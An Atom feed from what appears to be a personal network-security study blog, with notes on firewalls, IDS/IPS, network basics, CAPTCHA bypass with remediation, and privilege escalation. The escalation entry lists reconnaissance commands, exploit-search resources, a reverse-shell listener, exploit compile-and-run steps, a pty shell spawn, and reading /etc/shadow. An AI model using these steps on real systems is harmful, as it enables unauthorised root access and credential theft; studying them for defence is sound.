<?xml version="1.0" encoding="utf-8"?>
<feed xmlns="http://www.w3.org/2005/Atom">
<title>Network Security</title>
<subtitle>Study Notes</subtitle>
<link href="https://myprefer.github.io/atom.xml" rel="self"/>
<link href="https://myprefer.github.io/"/>
<updated>2024-06-14T03:54:34.075Z</updated>
<id>https://myprefer.github.io/</id>
<author>
<name>Myperfer</name>
</author>
<generator uri="https://hexo.io/">Hexo</generator>
<entry>
<title>Network security device fundamentals</title>
<link href="https://myprefer.github.io/post/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E8%AE%BE%E5%A4%87%E7%9B%B8%E5%85%B3%E7%9F%A5%E8%AF%86.html"/>
<id>https://myprefer.github.io/post/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E8%AE%BE%E5%A4%87%E7%9B%B8%E5%85%B3%E7%9F%A5%E8%AF%86.html</id>
<published>2024-06-13T07:40:52.000Z</published>
<updated>2024-06-14T03:54:34.075Z</updated>
<content type="html"><![CDATA[<h2 id="网络安全设备"><a href="#网络安全设备" class="headerlink" title="Network security devices"></a>Network security devices</h2><p><a href="https://myprefer.github.io/post/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E8%AE%BE%E5%A4%87%E7%9B%B8%E5%85%B3%E7%9F%A5%E8%AF%86">Network security device fundamentals | Myprefer’s Blog</a></p><h3 id="防火墙"><a href="#防火墙" class="headerlink" title="Firewall"></a>Firewall</h3><h4 id="作用"><a href="#作用" class="headerlink" title="Role"></a>Role</h4><ul><li><strong>Control</strong>: restrict inbound and outbound data (packet filtering, e.g. ACLs)</li><li><strong>Management</strong>: network isolation and protection (NAT)</li><li><strong>Logging</strong>: inspect inbound and outbound data and record the relevant information</li></ul><h4 id="功能"><a href="#功能" class="headerlink" title="Functions"></a>Functions</h4><ul><li><p>Enforce network access control at each layer of the protocol stack</p><ul><li>Network layer: packet filtering</li><li>Transport layer: circuit-level proxy</li><li>Application layer: application-layer proxy/gateway</li></ul></li><li><p>Control the data flows passing between network zones</p><ul><li>Inspect network traffic</li><li>Block vulnerable or insecure protocols and services</li><li>Prevent leakage of internal network information</li><li>Monitor and audit network access</li><li>Enforce network security policy and integrate network defence mechanisms</li></ul></li></ul><h4 id="不足"><a href="#不足" class="headerlink" title="Limitations"></a>Limitations</h4><ul><li>Cannot defend against internal threats (protects against outsiders, not insiders)</li><li>Cannot defend against viruses</li><li>Cannot defend against penetration attacks on vulnerabilities in exposed services</li><li>Cannot defend against penetration attacks on network client programs</li><li>Cannot defend against Trojans or botnets that use covert channels</li></ul><h4 id="分类"><a href="#分类" class="headerlink" title="Classification"></a>Classification</h4><ul><li>By form: hardware/software</li><li>By technique: packet filtering (transparent mode, attached to a switch) / proxy (can act as a router; NAT, ACL)</li></ul><h4 id="实现技术"><a href="#实现技术" class="headerlink" title="Implementation techniques"></a>Implementation techniques</h4><h5 id="包过滤"><a href="#包过滤" class="headerlink" title="Packet filtering"></a>Packet filtering</h5><ul><li>Mechanism: packets are accepted or dropped according to packet-level <strong>markers</strong> (header fields)</li><li>Advantages:<ul><li>Only the IP, TCP/UDP protocol and port fields are examined, so it is fast</li><li>Easy to configure</li><li>Transparent to users; no extra passwords or similar are required</li></ul></li><li>Disadvantages:<ul><li>Works only at the network layer; cannot recognise application-layer protocols or maintain connection state</li><li>Weak security; cannot prevent IP spoofing</li><li>Rules are hard to write correctly</li><li>Cannot incorporate authentication</li></ul></li></ul><h5 id="代理网关"><a href="#代理网关" class="headerlink" title="Proxy gateway"></a>Proxy gateway</h5><ul><li>Every connection between the internal and external networks is mediated and translated by the firewall, which strengthens control</li><li>Proxy techniques at different layers:<ul><li>Application layer: application-layer proxy (HTTP proxy)</li><li>Transport layer: circuit-level proxy (SOCKS proxy)</li><li>Network layer: NAT proxy (NAT gateway, dial-up router)</li></ul></li></ul><h5 id="代理-proxy-技术"><a href="#代理-proxy-技术" class="headerlink" title="Proxy technology"></a>Proxy technology</h5><ul><li>Allows clients to connect to network services indirectly through the proxy</li><li>Service control and content inspection can be performed on the proxy server</li></ul><h6 id="应用层代理"><a href="#应用层代理" class="headerlink" title="Application-layer proxy"></a>Application-layer proxy</h6><ul><li>Also called an application-layer gateway or proxy server</li><li>Proxies application-layer services such as HTTP and email</li></ul><h6 id="电路级代理"><a href="#电路级代理" class="headerlink" title="Circuit-level proxy"></a>Circuit-level proxy</h6><ul><li>Operates at the transport layer</li><li>Supports many different application services at once</li></ul><h5 id="NAT"><a href="#NAT" class="headerlink" title="NAT"></a>NAT</h5><ul><li>Translates private addresses into legitimate (public) addresses</li><li>Allows many users to share a few or a single IP address (source NAT)</li><li>Allows network services to be mapped to an internal server IP and port (destination NAT)</li></ul><h5 id="状态检测"><a href="#状态检测" class="headerlink" title="Stateful inspection"></a>Stateful inspection</h5><ul><li>Inspects packets between the data-link layer and the network layer</li><li>Creates a state table to maintain connection context</li><li>Characteristics: high security, high performance, good adaptability, transparent to users and applications</li></ul><p><img src="https://raw.githubusercontent.com/Myprefer/ImageHost/main/202406141017052.png"></p><h4 id="部署方式"><a href="#部署方式" class="headerlink" title="Deployment modes"></a>Deployment modes</h4><h5 id="路由模式"><a href="#路由模式" class="headerlink" title="Routed mode"></a>Routed mode</h5><ol><li>Configure the interface interconnection addresses (assign IPs).</li><li>Configure routes so that the addresses are reachable.</li><li>Configure source NAT so that internal servers can reach the public network.</li><li>Permit the corresponding firewall policies.</li></ol><p><img src="https://raw.githubusercontent.com/Myprefer/ImageHost/main/202406141034988.png"></p><p>When the firewall sits between the internal and external networks, the interfaces connecting it to the internal network, the external network and the DMZ must each be configured with IP addresses in different subnets and the original topology must be re-planned; the firewall then effectively acts as a <strong>router</strong>.</p><h5 id="透明模式"><a href="#透明模式" class="headerlink" title="Transparent mode"></a>Transparent mode</h5><p><img src="https://raw.githubusercontent.com/Myprefer/ImageHost/main/202406141036802.png"></p><p>If the firewall works in transparent mode, the trouble of changing the topology is avoided; the firewall is completely transparent to subnet users and routers, so users are not aware of its presence at all.</p><h5 id="混合模式"><a href="#混合模式" class="headerlink" title="Hybrid mode"></a>Hybrid mode</h5><p><img src="https://raw.githubusercontent.com/Myprefer/ImageHost/main/202406141037016.png"></p><p>If the firewall has both interfaces working in routed mode (with IP addresses) and interfaces working in transparent mode (without IP addresses), it is working in hybrid mode.</p><h4 id="部署方法"><a href="#部署方法" class="headerlink" title="Deployment architectures"></a>Deployment architectures</h4><h5 id="包过滤路由器"><a href="#包过滤路由器" class="headerlink" title="Packet-filtering router"></a>Packet-filtering router</h5><p><img src="C:\Users\Myprefer\AppData\Roaming\Typora\typora-user-images\image-20240614104619194.png" alt="image-20240614104619194"></p><ul><li><strong>Advantages</strong>: low cost, easy to use</li><li><strong>Disadvantages</strong>:<ul><li>Once the router is compromised, the internal network is fully exposed</li><li>Internal network information is visible externally, so exposed hosts and services can be attacked</li></ul></li></ul><h5 id="双宿主堡垒主机"><a href="#双宿主堡垒主机" class="headerlink" title="Dual-homed bastion host"></a>Dual-homed bastion host</h5><blockquote><p>Bastion host: exposed to the external network, and also the main connection point for internal network users</p><p>Dual-homed host: a general-purpose computer system with at least two network interfaces</p></blockquote><p><img src="https://raw.githubusercontent.com/Myprefer/ImageHost/main/202406141049303.png"></p><ul><li>An application proxy gateway used as the dual-homed bastion host<ul><li>One interface with a public IP address connects to the external network</li><li>One interface with a private IP address connects to the internal network</li><li>Application proxy server programs provide proxying for specific network applications</li></ul></li><li>Advantages: hides internal network information from outside; user authentication and behaviour auditing</li><li>Disadvantages:<ul><li>Access control for internal hosts reaching outward is overly strict</li><li>The bastion host itself is weakly protected</li><li>Once the bastion host is compromised, the internal network is fully exposed</li></ul></li></ul><h5 id="屏蔽主机"><a href="#屏蔽主机" class="headerlink" title="Screened host"></a>Screened host</h5><h5 id="屏蔽子网"><a href="#屏蔽子网" class="headerlink" title="Screened subnet"></a>Screened subnet</h5><blockquote><p>DMZ (Demilitarized Zone): an additional subnet placed between the internal and external networks</p></blockquote><p><img src="https://raw.githubusercontent.com/Myprefer/ImageHost/main/202406141113256.png"></p><ul><li>Three layers of protection: external firewall, application-layer proxy, internal firewall</li></ul><h4 id="策略设置"><a href="#策略设置" class="headerlink" title="Policy configuration"></a>Policy configuration</h4><ul><li>Whatever is not explicitly permitted is denied<ul><li>First block all packets</li><li>Then permit what is allowed</li></ul></li></ul><h3 id="入侵检测系统-IDS"><a href="#入侵检测系统-IDS" class="headerlink" title="Intrusion Detection System (IDS)"></a>Intrusion Detection System (IDS)</h3><p>An intrusion detection system is a network security device that monitors network traffic in real time and raises an alert or takes <strong>active</strong> countermeasures when suspicious traffic is found. What distinguishes it from other network security devices is that IDS is a proactive security technology.</p><h4 id="作用-1"><a href="#作用-1" class="headerlink" title="Role"></a>Role</h4><ul><li>An important complement to the firewall</li><li>A key component in building a network defence system</li><li>Overcomes the limitations of traditional defence mechanisms</li></ul><h4 id="功能-1"><a href="#功能-1" class="headerlink" title="Functions"></a>Functions</h4><ul><li>Monitor and analyse user and system activity</li><li>Check system configuration and vulnerabilities</li><li>Log management; identify anomalous activity</li><li>Respond to attack behaviour</li></ul><h4 id="技术架构"><a href="#技术架构" class="headerlink" title="Architecture"></a>Architecture</h4><ul><li>Event generator</li><li>Event analyser</li><li>Response unit</li><li>Event database</li></ul><h4 id="工作过程"><a href="#工作过程" class="headerlink" title="Workflow"></a>Workflow</h4><p><img src="https://raw.githubusercontent.com/Myprefer/ImageHost/main/202406141130084.png"></p><h4 id="种类"><a href="#种类" class="headerlink" title="Types"></a>Types</h4><ul><li>Network-based intrusion detection system (<strong>NIDS</strong>)<ul><li>The IDS can be placed behind the firewall or gateway, capturing all inbound and outbound packets as a network sniffer</li></ul></li><li>Host-based intrusion detection system (<strong>HIDS</strong>)<ul><li>The secure operating system must have auditing capability and record the relevant security events in the kernel</li></ul></li><li>Distributed intrusion detection system (<strong>DIDS</strong>)</li></ul><h4 id="局限性"><a href="#局限性" class="headerlink" title="Limitations"></a>Limitations</h4><ul><li>Complex to use</li><li>Current technology struggles to meet real-world performance needs</li><li>High false-alarm rate, placing a heavy burden on operators</li><li>Many alerts are hard to correlate with actual intrusions</li><li>Detection of other data may be affected</li></ul><h3 id="安全隔离与信息交换系统-网闸"><a href="#安全隔离与信息交换系统-网闸" class="headerlink" title="Security isolation and information exchange system (network gap)"></a>Security isolation and information exchange system (network gap)</h3><h4 id="组成"><a href="#组成" class="headerlink" title="Components"></a>Components</h4><ul><li>External processing unit</li><li>Internal processing unit</li><li>Arbitration processing unit</li></ul><h4 id="特点"><a href="#特点" class="headerlink" title="Characteristics"></a>Characteristics</h4><ul><li>Breaks the session between internal and external networks (physical isolation, protocol isolation)</li><li>Integrates other security technologies</li></ul><p><img src="https://raw.githubusercontent.com/Myprefer/ImageHost/main/202406141142951.png"></p><h3 id="入侵防御系统-IPS"><a href="#入侵防御系统-IPS" class="headerlink" title="Intrusion Prevention System (IPS)"></a>Intrusion Prevention System (IPS)</h3><p><img src="https://raw.githubusercontent.com/Myprefer/ImageHost/main/202406141143640.png"></p><h4 id="IDS与IPS"><a href="#IDS与IPS" class="headerlink" title="IDS vs IPS"></a>IDS vs IPS</h4><ul><li>IDS: out-of-band monitoring, detection only</li><li>IPS: inline mode, handles packets in real time</li></ul><h3 id="统一威胁管理系统-UTM"><a href="#统一威胁管理系统-UTM" class="headerlink" title="Unified Threat Management (UTM)"></a>Unified Threat Management (UTM)</h3><ul><li>Firewall + IDS + IPS + anti-virus gateway</li></ul><h3 id="网络架构安全设计"><a href="#网络架构安全设计" class="headerlink" title="Secure network architecture design"></a>Secure network architecture design</h3><ul><li>Partition the network into sensible security zones</li><li>Plan IP addressing and VLAN design</li><li>Securely configure routers and switches</li><li>Access control at network boundaries</li><li>Network redundancy (HSRP/VRRP) and load balancing<ul><li>Avoid single points of failure</li><li>Provide network robustness and security</li></ul></li></ul>]]></content>
<summary type="html"><h2 id="网络安全设备"><a href="#网络安全设备" class="headerlink" title="Network security devices"></a>Network security devices</h2><p><a href="https://myprefer.github.io/post/%E7%BD%91%E7%</summary>
</entry>
<entry>
<title>Network topology basics</title>
<link href="https://myprefer.github.io/post/%E7%BD%91%E7%BB%9C%E6%8B%93%E6%89%91%E5%9F%BA%E7%A1%80.html"/>
<id>https://myprefer.github.io/post/%E7%BD%91%E7%BB%9C%E6%8B%93%E6%89%91%E5%9F%BA%E7%A1%80.html</id>
<published>2024-06-10T08:02:31.000Z</published>
<updated>2024-06-14T05:52:24.026Z</updated>
<content type="html"><![CDATA[<p><a href="https://myprefer.github.io/post/%E7%BD%91%E7%BB%9C%E6%8B%93%E6%89%91%E5%9F%BA%E7%A1%80">Network topology basics | Myprefer’s Blog</a></p><h2 id="网络基础概念"><a href="#网络基础概念" class="headerlink" title="Basic network concepts"></a>Basic network concepts</h2><h3 id="IP地址"><a href="#IP地址" class="headerlink" title="IP address"></a>IP address</h3><ul><li>An IP address identifies a node (or a network device interface) in the network</li><li>IP addresses are used to address IP packets in the network</li></ul><p><em>An IP address is like a street address: it identifies a node in the network, and data uses it to find its destination</em></p><h4 id="IP地址格式"><a href="#IP地址格式" class="headerlink" title="IP address format"></a>IP address format</h4><p><strong>192.168.1</strong>.1</p><p>Network part (192.168.1) + host part</p><p>The <strong>subnet mask</strong> determines the length of the network part</p><ul><li><strong>192.168.1</strong>.1 — <strong>255.255.255</strong>.0 (mask)</li><li><strong>192.168</strong>.1.1 — <strong>255.255</strong>.0.0 (mask)</li></ul><p><img src="https://raw.githubusercontent.com/Myprefer/ImageHost/main/202406101743973.png"></p><h4 id="配置IP地址"><a href="#配置IP地址" class="headerlink" title="Configuring an IP address"></a>Configuring an IP address</h4><pre><code class="language-shell">interface &lt;interface&gt;
ip address 192.168.1.1 255.255.255.0
</code></pre><h4 id="Dhcp"><a href="#Dhcp" class="headerlink" title="DHCP"></a>DHCP</h4><ul><li>Purpose: automatically assigns IP configuration to computers/phones</li></ul><h3 id="DNS域名系统"><a href="#DNS域名系统" class="headerlink" title="DNS (Domain Name System)"></a>DNS (Domain Name System)</h3><p><img src="https://raw.githubusercontent.com/Myprefer/ImageHost/main/202406101830542.png"></p><h3 id="路由技术基础"><a href="#路由技术基础" class="headerlink" title="Routing basics"></a>Routing basics</h3><h4 id="网关"><a href="#网关" class="headerlink" title="Gateway"></a>Gateway</h4><p>Communication between <strong>different subnets</strong> must go through a gateway</p><h4 id="路由器"><a href="#路由器" class="headerlink" title="Router"></a>Router</h4><p>A router forwards packets by consulting its routing table to decide which interface a packet should leave from</p><ul><li>Display the routing table: <code>dis ip routing-table &lt;ip&gt;</code></li></ul><h4 id="TCP"><a href="#TCP" class="headerlink" title="TCP"></a>TCP</h4><ul><li>High reliability, three-way handshake</li><li>Higher latency</li></ul><p>Suited to services that need complete file transfer and are not latency-sensitive</p><h4 id="UDP"><a href="#UDP" class="headerlink" title="UDP"></a>UDP</h4><ul><li>Fast</li><li>Unreliable</li></ul><p>Suited to online games, video calls and the like</p><h4 id="交换机的接口模式"><a href="#交换机的接口模式" class="headerlink" title="Switch port modes"></a>Switch port modes</h4><ul><li>Access: connects end devices such as computers and printers</li><li>Trunk: connects to other switches</li></ul><h3 id="Vlan虚拟局域网"><a href="#Vlan虚拟局域网" class="headerlink" title="VLAN (virtual LAN)"></a>VLAN (virtual LAN)</h3><ul><li><p>Security and isolation<br>Devices within VLAN 10 can ping each other</p><p>Devices in VLAN 10 and VLAN 20 cannot ping each other</p></li></ul><p>Identifying which VLAN a packet belongs to:</p><ul><li>The switch tags packets and decides by the tag</li></ul><h3 id="ACL访问控制列表"><a href="#ACL访问控制列表" class="headerlink" title="ACL (access control list)"></a>ACL (access control list)</h3><p><strong>Screens</strong> and <strong>filters</strong> traffic according to predefined rules</p><h5 id="ACL的类型"><a href="#ACL的类型" class="headerlink" title="ACL types"></a>ACL types</h5><ul><li><strong>Standard ACL</strong>: filters on source IP address only</li><li><strong>Extended ACL</strong>: filters on source and destination IP, TCP/UDP protocol, and source and destination port</li></ul><h3 id="NAT网络地址转换"><a href="#NAT网络地址转换" class="headerlink" title="NAT (network address translation)"></a>NAT (network address translation)</h3><p>Used to allow private and public networks to reach each other</p><ul><li>Hosts outside the NAT cannot initiate communication with hosts inside it; an internal host that wants to communicate must first reach out to a public IP, and the router creates a <strong>mapping</strong> that it then uses to forward the data.</li></ul><h5 id="静态NAT"><a href="#静态NAT" class="headerlink" title="Static NAT"></a>Static NAT</h5><ul><li>Static NAT provides a one-to-one translation between a private address and a public address (e.g. a server's public IP).</li></ul><h3 id="远程管理网络设备"><a href="#远程管理网络设备" class="headerlink" title="Remote management of network devices"></a>Remote management of network devices</h3><ul><li>telnet:<pre><code class="language-sh">telnet &lt;IP&gt; &lt;PORT&gt;
</code></pre></li></ul>]]></content>
<summary type="html"><p><a href="https://myprefer.github.io/post/%E7%BD%91%E7%BB%9C%E6%8B%93%E6%89%91%E5%9F%BA%E7%A1%80">Network topology basics | Myprefer’s Blog</a></p>
<h2 id=</summary>
</entry>
<entry>
<title>Intranet security - network knowledge</title>
<link href="https://myprefer.github.io/post/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8-%E7%BD%91%E7%BB%9C%E7%9F%A5%E8%AF%86.html"/>
<id>https://myprefer.github.io/post/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8-%E7%BD%91%E7%BB%9C%E7%9F%A5%E8%AF%86.html</id>
<published>2024-06-01T03:11:57.000Z</published>
<updated>2024-06-01T03:20:11.238Z</updated>
<content type="html"><![CDATA[<h2 id="内网安全-网络知识"><a href="#内网安全-网络知识" class="headerlink" title="Intranet security - network knowledge"></a>Intranet security - network knowledge</h2><ul><li><p>Tunnelling: solves the problem of bringing a host online when its protocol cannot reach the outside (encapsulate it in a protocol that can leave the network, e.g. TCP -> UDP)</p></li><li><p>Proxying: solves the problem of unreachable network communication (establish a node on a pivot host for subsequent operations)</p></li><li><p>Connection direction: forward &amp; reverse (inside-to-outside / outside-to-inside)</p></li></ul>]]></content>
<summary type="html"><h2 id="内网安全-网络知识"><a href="#内网安全-网络知识" class="headerlink" title="Intranet security - network knowledge"></a>Intranet security - network knowledge</h2><ul>
<li><p>Tunnelling: solves the problem of bringing a host online when its protocol cannot reach the outside (encapsulate it in a protocol that can leave the network)(</summary>
</entry>
<entry>
<title>Web attack and defence - CAPTCHA security</title>
<link href="https://myprefer.github.io/post/WEB%E6%94%BB%E9%98%B2-%E9%AA%8C%E8%AF%81%E7%A0%81%E5%AE%89%E5%85%A8.html"/>
<id>https://myprefer.github.io/post/WEB%E6%94%BB%E9%98%B2-%E9%AA%8C%E8%AF%81%E7%A0%81%E5%AE%89%E5%85%A8.html</id>
<published>2024-05-07T09:32:21.000Z</published>
<updated>2024-05-07T14:24:11.405Z</updated>
<content type="html"><![CDATA[<h2 id="验证码安全"><a href="#验证码安全" class="headerlink" title="CAPTCHA security"></a>CAPTCHA security</h2><h4 id="找回密码客户端回显-Response状态值-修改重定向"><a href="#找回密码客户端回显-Response状态值-修改重定向" class="headerlink" title="Password recovery: client-side echo &amp; response status value &amp; redirect modification"></a>Password recovery: client-side echo &amp; response status value &amp; redirect modification</h4><ul><li><p>Deciding from the echoed status: judging the response on the front end is insecure</p><ul><li><p>Insecure approach:</p><pre><code class="language-txt">wrong code -> server returns status &lt;3&gt; -> browser shows "wrong"

wrong code -> server returns status &lt;3&gt; -> Burp proxy intercepts and changes it to &lt;1&gt; -> browser shows "correct"

-- the client-side check is authoritative
</code></pre></li><li><p>Secure approach:</p><pre><code class="language-txt">wrong code -> server returns status &lt;3&gt; -> Burp proxy intercepts and changes it to &lt;1&gt; -> browser shows "correct" -> server-side check fails -> failure

-- the server-side check is authoritative
</code></pre></li></ul></li><li><p>Redirect based on username: modifying the identifier bypasses verification</p></li><li><p>CAPTCHA echoed in the response: the leaked code makes the check meaningless</p><ul><li>The response packet itself contains the code, unencrypted or encrypted</li></ul></li><li><p>Weak CAPTCHA mechanism: a code that is too simple can be brute-forced</p><ul><li>A simple four-digit numeric code (0000~9999) has only 10,000 possibilities; without an attempt limit it can be brute-forced</li></ul></li></ul><h4 id="验证码验证安全机制-爆破-复用-识别"><a href="#验证码验证安全机制-爆破-复用-识别" class="headerlink" title="CAPTCHA verification security: brute force &amp; reuse &amp; recognition"></a>CAPTCHA verification security: brute force &amp; reuse &amp; recognition</h4><ul><li>Weak mechanism: the code is too simple and can be brute-forced</li><li>Code reuse: the verification mechanism can be bypassed</li><li>Automated recognition: the image CAPTCHA can be solved by software</li><li>Endpoint abuse: the CAPTCHA-triggering endpoint can be enumerated</li></ul><h4 id="验证码技术验证码爆破,验证码复用,验证码识别等"><a href="#验证码技术验证码爆破,验证码复用,验证码识别等" class="headerlink" title="CAPTCHA techniques: brute force, reuse, recognition, etc."></a>CAPTCHA techniques: brute force, reuse, recognition, etc.</h4><ul><li>Recognition tools:<ul><li><a href="https://github.com/smxiazi/NEW_xp_CAPTCHA">smxiazi/NEW_xp_CAPTCHA: xp_CAPTCHA Burp CAPTCHA-recognition plugin (github.com)</a></li><li><a href="https://github.com/c0ny1/captcha-killer">c0ny1/captcha-killer: Burp plugin for calling CAPTCHA-recognition APIs (github.com)</a></li></ul></li></ul><h4 id="安全修复方案"><a href="#安全修复方案" class="headerlink" title="Remediation"></a>Remediation</h4><ul><li>The recovery flow must verify every step, to prevent redirect bypass</li><li>The recovery flow must verify on the server side, to prevent data tampering</li><li>The recovery flow must control CAPTCHA security, to prevent CAPTCHA attacks</li><li>The CAPTCHA endpoint must be callable only after verification, to prevent abuse of the endpoint</li><li>Use CAPTCHAs that resist automation and require human judgement, to prevent automated recognition</li><li>CAPTCHAs must expire after a time window, to prevent reuse</li></ul>]]></content>
<summary type="html"><h2 id="验证码安全"><a href="#验证码安全" class="headerlink" title="CAPTCHA security"></a>CAPTCHA security</h2><h4 id="找回密码客户端回显-Response状态值-修改重定向"><a href="#找回密码客户端回显-Resp</summary>
</entry>
<entry>
<title>Privilege escalation</title>
<link href="https://myprefer.github.io/post/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8-%E6%9D%83%E9%99%90%E6%8F%90%E5%8D%87.html"/>
<id>https://myprefer.github.io/post/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8-%E6%9D%83%E9%99%90%E6%8F%90%E5%8D%87.html</id>
<published>2024-04-18T03:44:47.000Z</published>
<updated>2024-05-20T03:24:32.839Z</updated>
<content type="html"><![CDATA[<h2 id="权限提升"><a href="#权限提升" class="headerlink" title="Privilege escalation"></a>Privilege escalation</h2><p>Obtaining web privileges: plugins/applications, databases, middleware, website source code, admin back end… </p><p>Website front end: RCE vulnerabilities, code execution, command execution, file writes, writing a shell</p><h4 id="权限划分"><a href="#权限划分" class="headerlink" title="Privilege levels"></a>Privilege levels</h4><ul><li>Linux:<ul><li>Administrator, UID 0: the system administrator account</li><li>System users: UID 1~999</li><li>Ordinary users: UID from 1000 upward</li></ul></li><li>Windows<ul><li>Users and groups: SYSTEM (equivalent to root), Administrator, User, Guest, etc.</li></ul></li></ul><h4 id="具体的几种权限"><a href="#具体的几种权限" class="headerlink" title="Specific kinds of privilege"></a>Specific kinds of privilege</h4><ul><li>Back-end (admin panel) privileges:<ul><li>How obtained: brute force, injection-based guessing, weak passwords, etc.</li><li>Generally the back end of a site or application can only manipulate the application's content, such as data and images; it cannot touch the program's source code or resource files on the server</li><li>Escalating from here:<ul><li>Use account credentials and other information to obtain database privileges</li><li>Use file-editing functions to obtain website privileges such as a webshell</li></ul></li></ul></li><li>Website privileges<ul><li>How obtained: file writes, etc.</li><li>View or modify the program source code (depending on the permissions granted), read the site's or application's configuration files (API configuration, database configuration, etc.), and gather information about the server operating system in preparation for system privilege escalation</li></ul></li><li>Database privileges<ul><li>How obtained: source code or configuration file leaks, reading configuration files through a webshell, etc.</li><li>Privileges to operate on the database: insert, delete, update, query</li><li>Escalating from here:<ul><li>Obtain sensitive data; obtain back-end privileges</li><li>Write files; obtain a webshell</li></ul></li></ul></li><li>API privileges<ul><li>How obtained: the back end (configuration-editing features), website privileges (reading configuration files)</li><li>Email, SMS, payment and other service APIs</li></ul></li></ul><h3 id="Windows权限提升"><a href="#Windows权限提升" class="headerlink" title="Windows privilege escalation"></a>Windows privilege escalation</h3><h4 id="溢出漏洞"><a href="#溢出漏洞" class="headerlink" title="Overflow vulnerabilities"></a>Overflow vulnerabilities</h4><h5 id="操作前提"><a href="#操作前提" class="headerlink" title="Prerequisites"></a>Prerequisites</h5><ul><li>Local user: some user account on the current machine</li><li>Web privileges: web-level privileges on the current machine; escalation is performed once web privileges have already been obtained</li></ul><h5 id="成功条件"><a href="#成功条件" class="headerlink" title="Conditions for success"></a>Conditions for success</h5><ul><li>A matching operating system</li><li>A matching overflow vulnerability</li></ul><h5 id="常见步骤"><a href="#常见步骤" class="headerlink" title="Typical steps"></a>Typical steps</h5><ol><li><p><strong>Information gathering</strong></p><ul><li><p>Collect: OS version, installed patches, bitness (32/64), anti-virus protection, network, current user privileges, etc.</p></li><li><p>Common commands:</p><pre><code class="language-txt">ver
systeminfo
whoami
netstat -ano
tasklist /svc
</code></pre></li></ul></li><li><p>Based on the patch level, system version and bitness, find a usable overflow exploit (EXP), upload it and run it to escalate</p><ul><li><p>Approaches (<strong>automated escalation recommended</strong>):</p><ul><li><p>Manual</p></li><li><p>Semi-automated with CS</p></li><li><p>Fully automated with MSF</p></li></ul></li><li><p>Tools for manual escalation:</p><ul><li><a href="https://github.com/chroblert/WindowsVulnScan">WindowsVulnScan: host-based vulnerability scanner (github.com)</a></li><li><a href="https://github.com/vulmon/Vulmap">Vulmap: online local vulnerability scanner (github.com)</a></li><li><a href="https://github.com/bitsadmin/wesng">wesng: Windows Exploit Suggester - Next Generation (github.com)</a></li><li><strong>Web page</strong>: <a href="https://i.hacking8.com/tiquan">Windows privilege-escalation helper page (hacking8.com)</a></li></ul></li><li><p>Finding an EXP by vulnerability ID:</p><ul><li><strong>Recommended</strong>: <a href="https://github.com/Ascotbe/Kernelhub">Ascotbe/Kernelhub: collection of Linux, macOS and Windows privilege-escalation vulnerabilities (github.com)</a></li><li><a href="https://gitlab.com/exploit-database/exploitdb">Exploit-DB / Exploits + Shellcode + GHDB · GitLab</a></li><li><a href="https://github.com/nomi-sec/PoC-in-GitHub">nomi-sec/PoC-in-GitHub: 📡 PoCs automatically collected from GitHub</a></li><li><a href="https://github.com/k8gege/Ladon">k8gege/Ladon: Ladon large-scale intranet penetration tool</a></li></ul></li></ul></li></ol><h4 id="数据库"><a href="#数据库" class="headerlink" title="Database"></a>Database</h4><h4 id="第三方软件"><a href="#第三方软件" class="headerlink" title="Third-party software"></a>Third-party software</h4><h3 id="Linux提权"><a href="#Linux提权" class="headerlink" title="Linux privilege escalation"></a>Linux privilege escalation</h3><p>Usually, when you hold a webshell, the privileges are only web-level and rather low: you can run only some commands, such as viewing the current user, network and IP information. To proceed with intranet penetration the privileges must be raised to the highest level, such as system or super-administrator privileges.</p><h5 id="创建交互shell"><a href="#创建交互shell" class="headerlink" title="Creating an interactive shell"></a>Creating an interactive shell</h5><ul><li><p>Linux privilege escalation needs an interactive shell</p></li><li><p>Use the tool perl-reverse-shell.pl to set up the socket; locally, nc can listen on the port: <code>nc -vvlp 1234</code></p></li></ul><h5 id="查看发行版"><a href="#查看发行版" class="headerlink" title="Checking the distribution"></a>Checking the distribution</h5><ul><li><p><code>cat /etc/issue</code></p></li><li><p><code>cat /etc/*release</code></p></li><li><p>Check the kernel version: <code>uname -a</code></p></li></ul><h5 id="查看可用的提权exp"><a href="#查看可用的提权exp" class="headerlink" title="Finding a usable escalation exploit"></a>Finding a usable escalation exploit</h5><ul><li><a href="https://www.exploit-db.com/">Exploit Database - Exploits for Penetration Testers, Researchers, and Ethical Hackers (exploit-db.com)</a></li></ul><h5 id="进行提取"><a href="#进行提取" class="headerlink" title="Escalating"></a>Escalating</h5><ul><li><p>Compile the exploit on the target; if it fails to compile there, compile locally and upload it<br><code>gcc exp.c -o exp</code></p></li><li><p>Make it executable<br><code>chmod +x exp</code></p></li><li><p>Run the exploit</p></li><li><p>Switch to a proper shell -> <code>/bin/bash</code><br><code>python -c 'import pty;pty.spawn("/bin/bash")'</code></p></li><li><p>Check the current user id</p></li><li><p>Inspect sensitive files such as <code>/etc/shadow</code></p></li></ul>]]></content>
<summary type="html"><h2 id="权限提升"><a href="#权限提升" class="headerlink" title="Privilege escalation"></a>Privilege escalation</h2><p>Obtaining web privileges: plugins/applications, databases, middleware, website source code, admin back end… </p>
<p>Website front end: RCE vulnerabilities, code execution, </summary>
</entry>
<entry>
<title>Intranet security - information gathering</title>
<link href="https://myprefer.github.io/post/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8-%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86.html"/>
<id>https://myprefer.github.io/post/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8-%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86.html</id>
<published>2024-04-11T11:50:10.000Z</published>
<updated>2024-06-01T01:49:20.145Z</updated>
